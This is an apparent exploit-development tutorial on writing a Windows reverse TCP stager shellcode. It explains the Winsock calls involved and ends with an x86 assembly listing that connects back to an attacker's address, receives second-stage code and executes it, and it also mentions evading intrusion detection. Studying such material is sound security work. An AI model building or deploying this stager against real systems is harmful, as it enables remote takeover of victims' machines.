Developing a Custom Windows Reverse TCP Stager Shellcode — Part One
Crashing an application is just one part of the vulnerability research and exploit development process. After root-cause analysis, what follows is crafting an exploit that is reliable and stable. It is all an art of perfection, intrinsic to weaponizing an exploit.
Two essential features of exploit code are the size and the quality of the shellcode used; both affect the efficiency and effectiveness of the exploit. At some point, you will have to encrypt or decrypt, encode or decode, and patch your shellcode on the fly in an attempt to evade an Intrusion Detection System (IDS) or to deal with bad characters in your shellcode. Buffer size is yet another problem you have to grapple with, and in most cases, it is like trying to fit a three-seater sofa into a small car…
Contextualizing the purpose of a custom shellcode
For Remote Code Execution (RCE) exploits, access to the target machine is usually the goal. If the buffer where our shellcode should reside is smaller than the shellcode we intend to run, a stager shellcode is used. The first-stage shellcode connects back to the attacker’s machine, fetches a second-stage shellcode, and then executes it. Ideally, a custom shellcode makes an exploit more robust against a specific target and also reduces the size of the exploit code significantly.
Occasionally, a custom shellcode will have hardcoded memory addresses of specific functions, or at least a means to resolve the addresses of the needed functions at runtime. These memory addresses usually change across different Windows Service Packs and versions. In some cases, if the functions that you need in your shellcode are not loaded by the target application that you are exploiting, you will have to load them before proceeding. Fortunately, for RCE exploits, the target application usually uses network resources already, so your exploit only has to find the address of the already-loaded function and reuse it.
This article is my attempt to analyse and go through the fabric of what makes up a reverse TCP shellcode (feel free to help me improve the steps). I’ll focus specifically on reverse TCP stager shellcode. Ideally, once you know the nitty-gritty of developing a network-based shellcode, you should be able to transfer the steps herein to build any related shellcode, such as a bind TCP or connect-back TCP shellcode (with a cmd.exe STDIN stream).
Reverse TCP shellcode relies on network sockets
Applications use sockets to communicate over a network or the internet. A socket enables communication between a client and a server process, and it may be connection-oriented (TCP) or connectionless (UDP). The sockets interface varies slightly between operating systems. In the Windows operating system, Winsock (Windows Sockets API) defines a standard interface between a Windows TCP/IP client application and the underlying TCP/IP protocol stack.
According to MSDN, the WSASocket function creates a socket that is bound to a specific transport service provider.
SOCKET WSAAPI WSASocketA(
  int                 af,
  int                 type,
  int                 protocol,
  LPWSAPROTOCOL_INFOA lpProtocolInfo,
  GROUP               g,
  DWORD               dwFlags
);
MSDN has detailed WSASocket documentation that explains every parameter of this function. In summary, af is the address family specification; several families are defined, and AF_INET has a value of 2, which selects the Internet Protocol version 4 (IPv4) address family. The type parameter refers to the type specification for the new socket (the documented values run from 1 to 5; for TCP we must use SOCK_STREAM, which has a value of 1). For the protocol parameter, a value of 0 means the caller does not wish to specify a protocol and the service provider will choose the protocol to use.
The lpProtocolInfo parameter is a pointer to a WSAPROTOCOL_INFO structure that defines the characteristics of the socket to be created. We can leave it NULL if we do not need to retrieve or store complete information for a given protocol. For the group option, if the g parameter is an existing socket group ID, the new socket joins that group, provided all the requirements set by the group are met. If g is not an existing socket group ID, we can use a value of 0 (no group operation is performed). Lastly, dwFlags is a set of flags used to specify additional socket attributes, such as WSA_FLAG_MULTIPOINT_C_ROOT (0x02); a plain TCP connection needs none of them, so a value of 0 will be used, as in the assembly listing later in this article.
All these parameters are pushed onto the stack in reverse order before the call to the WSASocketA function.
What we are about to call — WSASocketA
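To make the reverse push order concrete, here is a minimal Python sketch that lists the six WSASocketA parameters in declaration order and prints them in the order they would be pushed. The names WSASOCKET_ARGS and push_order are made up for this illustration, and dwFlags is assumed to be 0.

```python
import socket

# WSASocketA parameters in declaration order, with the values discussed above.
# dwFlags = 0 is an assumption made for this sketch.
WSASOCKET_ARGS = [
    ("af", int(socket.AF_INET)),        # 2: IPv4 address family
    ("type", int(socket.SOCK_STREAM)),  # 1: stream (TCP) socket
    ("protocol", 0),                    # let the service provider choose
    ("lpProtocolInfo", 0),              # NULL
    ("g", 0),                           # no group operation
    ("dwFlags", 0),                     # no additional attributes
]

def push_order(args):
    """Return the arguments in the order they are pushed (last parameter first)."""
    return list(reversed(args))

for name, value in push_order(WSASOCKET_ARGS):
    print(f"push {value:#x}  ; {name}")
```

Because the last parameter is pushed first, af ends up on top of the stack when the call is made.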
At this point, we are on a roll. A couple of things to emphasize, though:
- We first need to call the WSAStartup function if the target application has not initialised Winsock; otherwise, you can simply craft a custom shellcode that uses the socket reuse technique.
- After calling the WSASocketA function to create the socket, we need to initiate a connection using connect(), use recv() to receive the second-stage shellcode, and then execute it.
The WSAStartup function allows an application or DLL to specify the version of Windows Sockets required and to retrieve details of the specific Windows Sockets implementation. The target application can only issue further Windows Sockets functions after successfully calling WSAStartup.
According to MSDN, wVersionRequested is the highest version of the Windows Sockets specification that the caller can use. The high-order byte specifies the minor version number; the low-order byte specifies the major version number. The second parameter, lpWSAData, is a pointer to the WSADATA data structure that is to receive details of the Windows Sockets implementation.
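The byte layout of wVersionRequested is easy to get backwards, so here is a small Python sketch of it. The helper names makeword and split_version are hypothetical; makeword only mimics what the Win32 MAKEWORD macro does.

```python
def makeword(low, high):
    """Combine two bytes into a 16-bit WORD, like the Win32 MAKEWORD macro."""
    return ((high & 0xFF) << 8) | (low & 0xFF)

def split_version(w_version_requested):
    """Return (major, minor): major is the low-order byte, minor the high-order byte."""
    return w_version_requested & 0xFF, (w_version_requested >> 8) & 0xFF

print(hex(makeword(2, 2)))     # a Winsock 2.2 request
print(split_version(0x0202))   # (major, minor) of that request
print(split_version(0x0190))   # the value used in the Metasploit snippet in this article
```

Read this way, 0x0190 is not a "real" Winsock version (major 0x90, minor 0x01). As far as I understand, it still works because WSAStartup accepts any request that is at least as high as the lowest version the Winsock DLL supports.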
Now, how do we find or define the size of the WSADATA structure so we can allocate some space for it on the stack? I checked how Metasploit implements its reverse TCP shellcode and figured out how it calls WSAStartup… After all, I guess we cannot fully reinvent the wheel (smiles). Below is a snippet from Metasploit’s reverse TCP shellcode block.
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this struct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
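One way to sanity-check the 0x0190 figure without a Windows compiler is to model the structure with Python's ctypes. The sketch below assumes the 32-bit field order from winsock2.h and represents the 32-bit lpVendorInfo pointer as a plain 4-byte integer; WSADATA32 is a name chosen for this illustration.

```python
import ctypes

class WSADATA32(ctypes.Structure):
    """Layout of WSADATA as seen by a 32-bit process (assumed field order)."""
    _fields_ = [
        ("wVersion", ctypes.c_uint16),
        ("wHighVersion", ctypes.c_uint16),
        ("szDescription", ctypes.c_char * 257),   # WSADESCRIPTION_LEN + 1
        ("szSystemStatus", ctypes.c_char * 129),  # WSASYS_STATUS_LEN + 1
        ("iMaxSockets", ctypes.c_uint16),
        ("iMaxUdpDg", ctypes.c_uint16),
        ("lpVendorInfo", ctypes.c_uint32),        # 32-bit pointer modelled as an integer
    ]

# The named fields add up to 398 bytes; alignment padding before the pointer adds 2 more.
print(hex(ctypes.sizeof(WSADATA32)))
```

Note that this only holds for 32-bit targets: on 64-bit Windows the pointer is 8 bytes and the fields are ordered differently, so the size is not the same.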
A layer below the abstractions — in the memory space
Putting everything together, we should have a call to WSAStartup and set up a new socket using WSASocketA. Having a socket, we can decide to bind to a port on the host or connect to a remote host. To use the socket created, we have to specify an IP address along with a port number.
In this case, we will receive data into a buffer as soon as we connect to the attacker’s machine, then execute the data we receive.
Assuming you are building an exploit and have figured out pointers to WSAStartup, WSASocketA, connect and recv, you should be able to develop a handy OS-specific shellcode. You can cut a 380-byte (generic reverse TCP) shellcode down to about 100 bytes! Below is a summary of the operation in x86 assembly (which you can convert to shellcode).
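The IP address and port are handed to connect() inside a 16-byte sockaddr_in structure, and the byte order of each field matters. The following Python sketch shows that layout; pack_sockaddr_in is a hypothetical helper, and the address 192.0.2.10 (a documentation-only range) and port 4444 are placeholder values.

```python
import socket
import struct

def pack_sockaddr_in(ip, port):
    """Build the 16-byte sockaddr_in for an IPv4 address and port."""
    return (
        struct.pack("<H", socket.AF_INET)  # sin_family, host (little-endian) order
        + struct.pack(">H", port)          # sin_port, network (big-endian) order
        + socket.inet_aton(ip)             # sin_addr, network order
        + b"\x00" * 8                      # sin_zero padding
    )

addr = pack_sockaddr_in("192.0.2.10", 4444)
print(len(addr), addr.hex())
```

Since x86 stores pushed values in little-endian order, an immediate pushed onto the stack has to be written byte-reversed relative to how these fields appear in memory.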
; Call WSAStartup
XOR EBX,EBX ; Zero EBX
MOV BX,0x0190 ; Set BX to 0x0190, the size of the WSAData struct
SUB ESP,EBX ; Create space for receiving the WSAData struct
PUSH ESP ; Push a pointer to the WSAData struct (lpWSAData)
PUSH EBX ; Push EBX as wVersionRequested
MOV EBX,[WSAStartup] ; Save pointer to WSAStartup in EBX
CALL EBX ; Call WSAStartup
; Setup a new socket using WSASocketA
XOR EDI,EDI ; Set EDI to NULL
PUSH EDI ; Push dwFlags parameter value 0
PUSH EDI ; Push g parameter value 0
PUSH EDI ; Push lpProtocolInfo parameter value NULL
PUSH EDI ; Push the protocol arg value 0
INC EDI ; Increment EDI to 1
PUSH EDI ; Push the type parameter value 1
INC EDI ; Increment EDI to 2
PUSH EDI ; Push af parameter value 2
MOV EBX,[WSASocketA] ; Save pointer to WSASocketA in EBX
CALL EBX ; CALL WSASocketA
MOV EDI,EAX ; Save socket descriptor in EDI
; Initiate a connection with connect()
PUSH 0x670a882 ; Push sin_addr (IPv4 address) on stack
PUSH WORD 0x0653 ; Push sin_port (port number) on stack
XOR EBX,EBX ; Zero EBX
ADD BL,2 ; Add 2 to BL for sin_family (AF_INET)
PUSH WORD BX ; Push sin_family on stack
MOV EDX,ESP ; Save pointer to the sockaddr_in structure in EDX
PUSH BYTE 16 ; Push the namelen parameter value as 0x10
PUSH EDX ; Push the pointer to the sockaddr structure
PUSH EDI ; Push the socket descriptor
MOV EBX,[connect] ; Save pointer to connect() in EBX
CALL EBX ; CALL connect()
; Use recv() for stage 2 shellcode
INC AH ; Increment EAX to 0x0100 (connect returned 0)
INC AH ; Increment EAX to 0x0200
SUB ESP,EAX ; Create 512 bytes buffer for the recv call
MOV EBP,ESP ; Save the pointer to the buffer in EBP
XOR ECX,ECX ; Zero ECX for use as the flags argument
PUSH ECX ; Push flags parameter value 0 (no flags)
PUSH EAX ; Push len parameter value as 512
PUSH EBP ; Push buf parameter (pointer to output buffer)
PUSH EDI ; Push s parameter value (WSASocketA descriptor)
MOV EBX,[recv] ; Save pointer to recv() in EBX
CALL EBX ; CALL recv()
; Jump to the stage 2 shellcode and execute
JMP EBP ; Jump to the buffer that was received
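The recv buffer size comes from the two INC AH instructions, and it is worth checking what they actually leave in EAX. Below is a rough Python emulation of that one instruction; inc_ah is a made-up helper, and the starting value of 0 assumes connect() succeeded.

```python
def inc_ah(eax):
    """Emulate INC AH: add 1 to bits 8..15 of EAX, wrapping within that byte."""
    ah = ((eax >> 8) + 1) & 0xFF
    return (eax & 0xFFFF00FF) | (ah << 8)

eax = 0            # connect() returns 0 on success
eax = inc_ah(eax)  # first INC AH
eax = inc_ah(eax)  # second INC AH
print(hex(eax), eax)
```

Each INC AH adds 0x100 to EAX, so two of them give a 512-byte buffer. A 4096-byte (0x1000) buffer would need AH to reach 0x10.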
When assembled, we have approximately 88 bytes of shellcode \0/ (yeah!). However, make sure to avoid null characters in your shellcode.
In part two, I’ll write out the stager shellcode in C/C++ and then port it to full x86 assembly (while avoiding null chars).
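Checking the assembled bytes for null characters is easy to automate. The sketch below is one possible way to do it; find_bad_bytes is a hypothetical helper, and the two byte strings are the standard x86 encodings of MOV EAX,0 and XOR EAX,EAX, used here only to show why the listing zeroes registers with XOR.

```python
def find_bad_bytes(code, bad=b"\x00"):
    """Return (offset, byte) pairs for every byte of `code` that appears in `bad`."""
    return [(i, b) for i, b in enumerate(code) if b in bad]

# Two encodings of "EAX = 0": MOV EAX,0 (B8 00 00 00 00) versus XOR EAX,EAX (31 C0)
mov_eax_zero = bytes.fromhex("b800000000")
xor_eax_eax = bytes.fromhex("31c0")

print(find_bad_bytes(mov_eax_zero))  # offsets of the null bytes in the MOV form
print(find_bad_bytes(xor_eax_eax))   # empty list: no null bytes
```

The bad parameter can hold more than one byte if the target also chokes on other characters, for example b"\x00\x0a\x0d".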